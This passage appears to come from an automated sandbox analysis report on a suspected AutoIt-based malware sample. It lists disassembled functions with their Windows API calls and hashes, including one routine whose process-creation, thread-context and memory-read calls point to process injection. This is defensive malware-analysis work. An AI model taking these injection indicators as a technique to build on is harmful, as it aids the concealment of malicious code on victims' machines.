                                                                                  • Part of subcall function 003B5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00471148,?,003B61FF,?,00000000,00000001,00000000), ref: 003B5392
                                                                                  • Part of subcall function 003B49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003B4A1D
                                                                                • _wcscat.LIBCMT ref: 00422D80
                                                                                • _wcscat.LIBCMT ref: 00422DB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileModuleNameOpen
                                                                                • String ID: 8!G$\$\Include\
                                                                                • API String ID: 3592542968-2847565545
                                                                                • Opcode ID: 05f18f9407820d20745301de4b50dfcdea2d9bd119c8726bcf1ca0e9cd11d785
                                                                                • Instruction ID: ea82bba06b1658bae3d6a16f3166a1786700344530da3437517c5b47bc2eb9ec
                                                                                • Opcode Fuzzy Hash: 05f18f9407820d20745301de4b50dfcdea2d9bd119c8726bcf1ca0e9cd11d785
                                                                                • Instruction Fuzzy Hash: B851A3725143409FC315EF59EA8299AB3F4FF49304FC0493EF28897661EBB49684CB5A
                                                                                Function 003B51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003B522F
                                                                                • _wcscpy.LIBCMT ref: 003B5283
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003B5293
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00423CB0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                • String ID: Line:
                                                                                • API String ID: 1053898822-1585850449
                                                                                • Opcode ID: bad684de66dc4874015a22e3ad79d53892d2c13a3b6e4832aaa9044767849b9e
                                                                                • Instruction ID: 39dceb3a74206ac2f270e56fbb761e95e224751584c8d42308b85cac4753105c
                                                                                • Opcode Fuzzy Hash: bad684de66dc4874015a22e3ad79d53892d2c13a3b6e4832aaa9044767849b9e
                                                                                • Instruction Fuzzy Hash: 9631E6715083446ED722EF64EC42FDE77D8AB44304F00451FF6899A9A2DB74A648CB9A
                                                                                Function 003B4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003B39FE,?,00000001), ref: 003B41DB
                                                                                • _free.LIBCMT ref: 004236B7
                                                                                • _free.LIBCMT ref: 004236FE
                                                                                  • Part of subcall function 003BC833: __wsplitpath.LIBCMT ref: 003BC93E
                                                                                  • Part of subcall function 003BC833: _wcscpy.LIBCMT ref: 003BC953
                                                                                  • Part of subcall function 003BC833: _wcscat.LIBCMT ref: 003BC968
                                                                                  • Part of subcall function 003BC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 003BC978
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                • API String ID: 805182592-1757145024
                                                                                • Opcode ID: 1a42bdf6a41597735737eee22f46906601a3f0bb318d1691a1bcc40087408d94
                                                                                • Instruction ID: 338d15b0e99905b90fb7082c593b9ead8fcbfbf605068e6625f37ce5a09db81e
                                                                                • Opcode Fuzzy Hash: 1a42bdf6a41597735737eee22f46906601a3f0bb318d1691a1bcc40087408d94
                                                                                • Instruction Fuzzy Hash: 9891B171A10229EFCF15EFA4DC81AEEB7B4FF08314F50442AF516AB291DB389A45CB54
                                                                                Function 003B40E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00423725
                                                                                • GetOpenFileNameW.COMDLG32 ref: 0042376F
                                                                                  • Part of subcall function 003B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B53B1,?,?,003B61FF,?,00000000,00000001,00000000), ref: 003B662F
                                                                                  • Part of subcall function 003B40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B40C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                • String ID: X$t3F
                                                                                • API String ID: 3777226403-3644656231
                                                                                • Opcode ID: 91c7534a11dc872f4998935d0c979554302b491f0e1c12003549003a4d617413
                                                                                • Instruction ID: fa78a1f2d872a7a8ac73820cf1b33ab41d1a61d0da1e86269bbe3fcca6ec3131
                                                                                • Opcode Fuzzy Hash: 91c7534a11dc872f4998935d0c979554302b491f0e1c12003549003a4d617413
                                                                                • Instruction Fuzzy Hash: 7221EB71A10198AFCF02DFD8D8457DEBBFD9F49304F00801AE505AB341DBB85A898F69
                                                                                Function 003D34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getstream.LIBCMT ref: 003D34FE
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 003D3539
                                                                                • __wopenfile.LIBCMT ref: 003D3549
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                • String ID: <G
                                                                                • API String ID: 1820251861-2138716496
                                                                                • Opcode ID: 452351707d1c2eb68afdefc424df8f8e68767011035b24a9f023fd31ef6983fb
                                                                                • Instruction ID: 87ba268dabe75fb778799859b28db0fdb1a6dd26ec429efee2d630f080f1a8f2
                                                                                • Opcode Fuzzy Hash: 452351707d1c2eb68afdefc424df8f8e68767011035b24a9f023fd31ef6983fb
                                                                                • Instruction Fuzzy Hash: 7F112773A002069EDB13BF72BC4266E36B5AF06750B168527F415DF381FA38CE1097A2
                                                                                Function 003CD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003CD28B,SwapMouseButtons,00000004,?), ref: 003CD2BC
                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003CD28B,SwapMouseButtons,00000004,?,?,?,?,003CC865), ref: 003CD2DD
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,003CD28B,SwapMouseButtons,00000004,?,?,?,?,003CC865), ref: 003CD2FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: dad3b54579a58cb1d722100e93ba1908a5ea17200b150c0a81a9e740425158a0
                                                                                • Instruction ID: c869703e6306c35e48aef65335880bb002a43dd24e9f84cb3321abdaad6d4fc4
                                                                                • Opcode Fuzzy Hash: dad3b54579a58cb1d722100e93ba1908a5ea17200b150c0a81a9e740425158a0
                                                                                • Instruction Fuzzy Hash: AA113579A11218BFDB228FA8DC84EAF7BBCEF44744F105869F805D7210E731AE419B64
                                                                                Function 01008790 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01008F4B
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01008FE1
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01009003
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1445160018.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1007000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                                                                                • Instruction ID: f0e759ba484123af1a0c25d2740fd8bcc625e5a026a7635028a42d8290761393
                                                                                • Opcode Fuzzy Hash: 3790e136272a110f5ab4d8617909c812004bdd41f4683ed991f3cafb80161bff
                                                                                • Instruction Fuzzy Hash: B1620A30A14258DBEB25CFA4C850BDEB772EF58304F1091A9D20DEB2D1E7759E81CB59
                                                                                Function 003FC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B4517: _fseek.LIBCMT ref: 003B452F
                                                                                  • Part of subcall function 003FC56D: _wcscmp.LIBCMT ref: 003FC65D
                                                                                  • Part of subcall function 003FC56D: _wcscmp.LIBCMT ref: 003FC670
                                                                                • _free.LIBCMT ref: 003FC4DD
                                                                                • _free.LIBCMT ref: 003FC4E4
                                                                                • _free.LIBCMT ref: 003FC54F
                                                                                  • Part of subcall function 003D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,003D7A85), ref: 003D1CB1
                                                                                  • Part of subcall function 003D1C9D: GetLastError.KERNEL32(00000000,?,003D7A85), ref: 003D1CC3
                                                                                • _free.LIBCMT ref: 003FC557
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                • String ID:
                                                                                • API String ID: 1552873950-0
                                                                                • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                • Instruction ID: 654a26ec5ccab6e93794f6b4d26997e71651d4f803ffd46361c3b2324b6a8ea6
                                                                                • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                • Instruction Fuzzy Hash: F0516DB190421CAFDB269F65DC81BEDBBB9EF48304F1000AEB24DA7241DB715A908F59
                                                                                Function 003FC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 003FC72F
                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003FC746
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                • API String ID: 3285503233-3010740371
                                                                                • Opcode ID: df43fadc1952883d4bd120a3574d969cbeb63a46d8c5cbcd10aef289871e7623
                                                                                • Instruction ID: fc5f6e88bf3b639dcae34f5d244f92f1e4e38cf1bfa780c5cce6d49b227dc136
                                                                                • Opcode Fuzzy Hash: df43fadc1952883d4bd120a3574d969cbeb63a46d8c5cbcd10aef289871e7623
                                                                                • Instruction Fuzzy Hash: BFD05E7190030EABDB10ABA0EC0EF8B776C9700704F0001A17650A50B1DAB4E6998B5A
                                                                                Function 0040F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1b5804c2445b2069cabdba2e9f807227f69c86df9703ad56bf82ddeec11a734a
                                                                                • Instruction ID: 760f39448c00bce8b95215cd97cc8513a66926c2c06db3fb5e8efc3432be0939
                                                                                • Opcode Fuzzy Hash: 1b5804c2445b2069cabdba2e9f807227f69c86df9703ad56bf82ddeec11a734a
                                                                                • Instruction Fuzzy Hash: 58F148716083059FC720DF24C481B6AB7E5BF88314F14893EF9999B292DB74E949CB86
                                                                                Function 003B4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003B5022
                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003B50CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell__memset
                                                                                • String ID:
                                                                                • API String ID: 928536360-0
                                                                                • Opcode ID: 3cd0bdb3552be1a3fc5d336cc3b48105de0627cd4e90242772f3f7d12989c8c7
                                                                                • Instruction ID: 0df6fd88465a14c3805aeca7a88df43d6bdfc39c25749b6cb0a35595a1bebc6e
                                                                                • Opcode Fuzzy Hash: 3cd0bdb3552be1a3fc5d336cc3b48105de0627cd4e90242772f3f7d12989c8c7
                                                                                • Instruction Fuzzy Hash: FA31A2B1504740CFD721EF28E8457D7BBE4FF48308F00092EE69E86651E7716948CB96
                                                                                Function 003D395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __FF_MSGBANNER.LIBCMT ref: 003D3973
                                                                                  • Part of subcall function 003D81C2: __NMSG_WRITE.LIBCMT ref: 003D81E9
                                                                                  • Part of subcall function 003D81C2: __NMSG_WRITE.LIBCMT ref: 003D81F3
                                                                                • __NMSG_WRITE.LIBCMT ref: 003D397A
                                                                                  • Part of subcall function 003D821F: GetModuleFileNameW.KERNEL32(00000000,00470312,00000104,00000000,00000001,00000000), ref: 003D82B1
                                                                                  • Part of subcall function 003D821F: ___crtMessageBoxW.LIBCMT ref: 003D835F
                                                                                  • Part of subcall function 003D1145: ___crtCorExitProcess.LIBCMT ref: 003D114B
                                                                                  • Part of subcall function 003D1145: ExitProcess.KERNEL32 ref: 003D1154
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                • RtlAllocateHeap.NTDLL(00F30000,00000000,00000001,00000001,00000000,?,?,003CF507,?,0000000E), ref: 003D399F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1372826849-0
                                                                                • Opcode ID: 4bd7737dba997af97997dc540c6cdc4f0e8aee609e65b48e553ba3d1ee675b75
                                                                                • Instruction ID: f0ef3e4c3668601a8e2ce8cdb97fcb50dfac87c23a3e9bd77b34dd20ef0f97a0
                                                                                • Opcode Fuzzy Hash: 4bd7737dba997af97997dc540c6cdc4f0e8aee609e65b48e553ba3d1ee675b75
                                                                                • Instruction Fuzzy Hash: 5A0196B7286201ABE6133B25FC62B2A63589B81760B21002BF5059F391DBF09D408665
                                                                                Function 003FC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003FC385,?,?,?,?,?,00000004), ref: 003FC6F2
                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003FC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003FC708
                                                                                • CloseHandle.KERNEL32(00000000,?,003FC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003FC70F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 23e02c7a538289d097fa7229c4f34712e1611242449d6177bf4563c99a1838ff
                                                                                • Instruction ID: 2d2a49e562e73473bc013b79dec21378892be2fe12c315767f70cde474c75bf4
                                                                                • Opcode Fuzzy Hash: 23e02c7a538289d097fa7229c4f34712e1611242449d6177bf4563c99a1838ff
                                                                                • Instruction Fuzzy Hash: ADE08632580218BBDB212B54BC09FCA7B18AB05760F104120FB15690E097B12911979C
                                                                                Function 003FBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 003FBB72
                                                                                  • Part of subcall function 003D1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,003D7A85), ref: 003D1CB1
                                                                                  • Part of subcall function 003D1C9D: GetLastError.KERNEL32(00000000,?,003D7A85), ref: 003D1CC3
                                                                                • _free.LIBCMT ref: 003FBB83
                                                                                • _free.LIBCMT ref: 003FBB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                • Instruction ID: 59d07ccf370bb9b29e9fac5bed691a52b9cb3d70c2932820e0a8b8b93fa9f67b
                                                                                • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                • Instruction Fuzzy Hash: 0EE0C2E220070153CA216538FE44EB353CC0F04312714080EB519EB242DF20EC4084A4
                                                                                Function 003B2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003B24F1), ref: 003B2303
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003B25A1
                                                                                • CoInitialize.OLE32(00000000), ref: 003B2618
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0042503A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 3815369404-0
                                                                                • Opcode ID: ec6f732b642b6b444941b96c4dbd6cfd3e26bff63df25b09f94092fffab79bf8
                                                                                • Instruction ID: dd54b4c0ab00f0e03b969d3bca561605e65d8053b026c0a901072ba58bb81204
                                                                                • Opcode Fuzzy Hash: ec6f732b642b6b444941b96c4dbd6cfd3e26bff63df25b09f94092fffab79bf8
                                                                                • Instruction Fuzzy Hash: 8F71E2B49113818BD305EF6EA992595BBA8F75834478082BFD50DEB772DB740884CF1D
